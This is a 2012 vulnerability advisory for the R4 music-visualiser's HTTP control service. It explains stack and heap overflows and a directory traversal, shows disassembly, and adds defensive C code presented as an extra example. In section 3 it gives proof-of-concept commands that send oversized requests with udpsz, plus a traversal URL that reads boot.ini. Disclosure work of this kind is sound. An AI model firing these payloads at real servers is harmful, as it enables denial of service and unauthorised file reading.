R4 1.25 Overflows / Directory Traversal

Posted Feb 17, 2012
Authored by Luigi Auriemma | Site aluigi.org

R4 versions 1.25 and below suffer from stack overflows, a heap overflow, and a directory traversal vulnerability.

tags | exploit, overflow
MD5 | 4becbc0586fa6f248aaff1c3084f2812

#######################################################################

Luigi Auriemma

Application: R4
http://r4.rabidhamster.org/R4/
Versions: <= 1.25
Platforms: Windows
Bugs: A] stack overflow
B] heap overflow
C] directory traversal
D] screenshot stack overflow
Exploitation: remote
Date: 09 Feb 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:
"R4 is a standalone OpenGL accelerated program which aims to produce
animated 3D graphics in real-time that twist and turn with the music."

It is widely used at parties and other events that need 3D animations
driven by the music currently being played.


#######################################################################

=======
2) Bugs
=======


R4 includes an HTTP service, disabled by default (it listens on port 8888
when enabled), that allows the program to be controlled remotely. All of
the following vulnerabilities are located in this component.


-----------------
A] stack overflow
-----------------

Stack-based buffer overflow caused by calling sprintf() to build a log
string from the HTTP arguments received from the client into a 2 kilobyte
(0x800 byte) stack buffer, with no check on the length of the arguments:

0041ECD0 /$ 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4]
0041ECD4 |. 81EC 00080000 SUB ESP,800
0041ECDA |. 85D2 TEST EDX,EDX
0041ECDC |. 75 05 JNZ SHORT R4.0041ECE3
0041ECDE |. BA 349C4B00 MOV EDX,R4.004B9C34
0041ECE3 |> 8B8C24 08080000 MOV ECX,DWORD PTR SS:[ESP+808]
0041ECEA |. 85C9 TEST ECX,ECX
0041ECEC |. 75 05 JNZ SHORT R4.0041ECF3
0041ECEE |. B9 349C4B00 MOV ECX,R4.004B9C34
0041ECF3 |> 8B8424 0C080000 MOV EAX,DWORD PTR SS:[ESP+80C]
0041ECFA |. 85C0 TEST EAX,EAX
0041ECFC |. 74 2E JE SHORT R4.0041ED2C
0041ECFE |. 53 PUSH EBX
0041ECFF |. 8A18 MOV BL,BYTE PTR DS:[EAX]
0041ED01 |. 84DB TEST BL,BL
0041ED03 |. 5B POP EBX
0041ED04 |. 74 26 JE SHORT R4.0041ED2C
0041ED06 |. 50 PUSH EAX
0041ED07 |. 51 PUSH ECX
0041ED08 |. 52 PUSH EDX
0041ED09 |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]
0041ED0D |. 68 60654B00 PUSH R4.004B6560 ; "]%s>%s [%s]"
0041ED12 |. 50 PUSH EAX ; stack buffer
0041ED13 |. E8 7B3C0000 CALL R4.00422993 ; sprintf()
0041ED18 |. 83C4 14 ADD ESP,14
0041ED1B |. 8D5424 00 LEA EDX,DWORD PTR SS:[ESP]
0041ED1F |. 52 PUSH EDX
0041ED20 |. E8 2BFEFFFF CALL R4.0041EB50
0041ED25 |. 81C4 04080000 ADD ESP,804
0041ED2B |. C3 RETN


----------------
B] heap overflow
----------------

Heap overflow (heap corruption) triggered by a long HTTP URI; the proof of
concept in section 3 sends a request path of 20000 bytes.


----------------------
C] directory traversal
----------------------

Directory traversal through the "loadfile" script command, which can be
invoked from left_console.html. The path argument is not sanitized, so
".." sequences allow an attacker to read files anywhere on the disk on
which the software is installed.


----------------------------
D] screenshot stack overflow
----------------------------

Stack overflow through the "miniscreenshot" command: the screenshot name
taken from the request is formatted with sprintf() as "%s/scene/%s.jpg"
into a 0x104 byte (260 byte, MAX_PATH) stack buffer without any length
check:

0040B980 . 8B5424 04 MOV EDX,DWORD PTR SS:[ESP+4]
0040B984 . 81EC 04010000 SUB ESP,104
...
0040BA1F . 8B15 109C4B00 MOV EDX,DWORD PTR DS:[4B9C10]
0040BA25 . 56 PUSH ESI
0040BA26 . 52 PUSH EDX
0040BA27 . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
0040BA2B . 68 F02A4B00 PUSH R4.004B2AF0 ; "%s/scene/%s.jpg"
0040BA30 . 50 PUSH EAX ; stack buffer
0040BA31 . E8 5D6F0100 CALL R4.00422993 ; sprintf()

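As an added example, not R4's code and not part of the original advisory, the following C models the two sprintf() sites shown above (bugs A and D) with bounded snprintf() equivalents that report truncation instead of overflowing, and adds an allow-list check of the kind that would close the loadfile() traversal (bug C). The buffer sizes (0x800 and 0x104) come from the disassembly; the function names, the "C:/R4" base directory, the 'a'-filled inputs that mimic the proof of concept, and the path policy are assumptions made for the example.

```c
/*
 * Added example (not R4's code): bounded replacements for the two sprintf()
 * sites in the advisory (bugs A and D) and an allow-list check for the
 * loadfile() argument (bug C). Buffer sizes come from the disassembly:
 * SUB ESP,800 (log routine) and SUB ESP,104 (screenshot routine).
 * Function names, the "C:/R4" base directory and the path policy are
 * assumptions made for this example.
 */
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LOG_BUF_SIZE  0x800   /* 2 KB stack buffer in the log routine (bug A) */
#define PATH_BUF_SIZE 0x104   /* 260 bytes == MAX_PATH in the screenshot routine (bug D) */

static char scratch_log[LOG_BUF_SIZE];    /* output buffers shared by the demo */
static char scratch_path[PATH_BUF_SIZE];

/* Bounded form of the "]%s>%s [%s]" log formatter. Returns true if the whole
 * string fit; false means snprintf() truncated it, which is exactly the input
 * that overflowed the stack in the original. The output is always terminated. */
bool format_log_line(char *out, size_t out_size,
                     const char *a, const char *b, const char *c)
{
    /* The original substitutes a fixed string for NULL arguments; do the same. */
    if (a == NULL) a = "";
    if (b == NULL) b = "";
    if (c == NULL) c = "";
    int n = snprintf(out, out_size, "]%s>%s [%s]", a, b, c);
    return n >= 0 && (size_t)n < out_size;
}

/* Bounded form of the "%s/scene/%s.jpg" path builder used by miniscreenshot. */
bool format_screenshot_path(char *out, size_t out_size,
                            const char *base_dir, const char *name)
{
    int n = snprintf(out, out_size, "%s/scene/%s.jpg", base_dir, name);
    return n >= 0 && (size_t)n < out_size;
}

/* Feed the log formatter an argument of `len` 'a' bytes, mimicking the PoC's
 * 3000-byte filler, and report whether the result fit in the 0x800 buffer. */
bool log_line_fits(size_t len)
{
    char *arg = malloc(len + 1);
    if (arg == NULL) return false;
    memset(arg, 'a', len);
    arg[len] = '\0';
    bool fit = format_log_line(scratch_log, sizeof scratch_log, arg, "", "");
    free(arg);
    return fit;
}

/* Same for the screenshot path with a `len`-byte name (the PoC uses 500). */
bool screenshot_path_fits(size_t len)
{
    char *name = malloc(len + 1);
    if (name == NULL) return false;
    memset(name, 'a', len);
    name[len] = '\0';
    bool fit = format_screenshot_path(scratch_path, sizeof scratch_path, "C:/R4", name);
    free(name);
    return fit;
}

/* Allow-list check for a loadfile() argument, run before any file API sees it.
 * Policy (an assumption for this example): relative path, '/' separators only,
 * no empty, "." or ".." components, no backslash and no colon (drive letters,
 * NTFS streams). Anything else is rejected rather than "cleaned up". */
bool loadfile_arg_ok(const char *arg)
{
    if (arg == NULL || *arg == '\0') return false;
    if (strchr(arg, '\\') != NULL || strchr(arg, ':') != NULL) return false;
    const char *p = arg;
    for (;;) {
        const char *seg = p;
        while (*p != '\0' && *p != '/') p++;
        size_t len = (size_t)(p - seg);
        if (len == 0) return false;            /* leading, doubled or trailing '/' */
        if (len == 1 && seg[0] == '.') return false;
        if (len == 2 && seg[0] == '.' && seg[1] == '.') return false;
        if (*p == '\0') return true;
        p++;                                   /* skip the '/' */
    }
}

int main(void)
{
    printf("log line, 3000 x 'a':  %s\n",
           log_line_fits(3000) ? "fits" : "truncated (original: stack overflow)");
    printf("screenshot, 500 x 'a': %s\n",
           screenshot_path_fits(500) ? "fits" : "truncated (original: stack overflow)");
    printf("loadfile(../../../../../boot.ini): %s\n",
           loadfile_arg_ok("../../../../../boot.ini") ? "allowed" : "rejected");
    return 0;
}
```

The important design point is that truncation is reported to the caller rather than silently accepted: a log line or screenshot path that does not fit should be dropped or the request rejected, and the traversal check is an allow-list on the path's components, not a search-and-replace of "..".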

#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip

The proofs of concept use the author's udpsz packet-sending tool (link
above). In each command SERVER is the target host, 8888 is the port of the
R4 HTTP service, and the trailing number is the size of the filler payload
of 'a' bytes, chosen to exceed the buffer sizes shown in section 2.

A]
udpsz -T -b a -c "GET /?" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 3000

B]
udpsz -T -b a -c "GET /" 0 -c "HTTP/1.0\r\n\r\n" -1 SERVER 8888 20000

C]
http://SERVER:8888/left_console.html?cmd=loadfile([../../../../../boot.ini])

D]
udpsz -T -b a -c "GET /left_console.html?cmd=miniscreenshot([" 0 -c "]) HTTP/1.0\r\n\r\n" -1 SERVER 8888 500


#######################################################################

======
4) Fix
======


No fix.


#######################################################################

